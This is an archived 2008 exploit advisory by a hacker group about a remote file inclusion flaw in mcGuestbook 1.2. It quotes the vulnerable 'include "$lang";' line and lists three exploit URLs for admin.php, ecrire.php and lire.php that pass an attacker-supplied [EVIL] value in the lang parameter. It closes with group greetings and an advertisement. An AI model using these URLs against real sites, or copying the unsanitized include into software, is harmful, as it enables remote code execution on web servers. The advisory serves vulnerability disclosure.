Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20082
HistoryJun 26, 2008 - 12:00 a.m.

mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability

2008-06-2600:00:00
vulners.com
60

hi
######################################################################
mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
######################################################################
[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
[~] HOME : www.Real-Hack.net | )(o/ \o)( |
[~] Email : [email protected] |/ /\ \|
[~] Script : mcGuestbook 1.2
[~] Download Script : http://www.phpbank.net/admin/download.php?id=155
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Error ( admin.php + ecrire.php + lire.php ) :
include "$lang";

[~] Exploit :
http://xxxx/[Path]/ecrire.php?lang=[EVIL]
http://xxxx/[Path]/admin.php?lang=[EVIL]
http://xxxx/[Path]/lire.php?lang=[EVIL]
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB …
Mr.JUVE & Mr.hope & LeGeNd HaCkEr …
All Member Real Hack And All My Friends …
######################################################################
Real Hack Team ( R-H ) …
######################################################################

see y0u …


Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/